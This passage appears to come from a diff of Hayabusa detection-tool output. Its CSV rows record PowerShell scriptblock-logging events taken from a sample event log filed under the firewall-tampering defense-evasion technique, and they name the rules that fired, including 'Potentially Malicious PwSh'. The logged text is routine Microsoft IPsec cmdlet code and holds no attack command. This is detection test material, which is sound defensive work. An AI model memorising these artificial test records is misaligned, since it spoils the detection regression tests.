[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetA",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 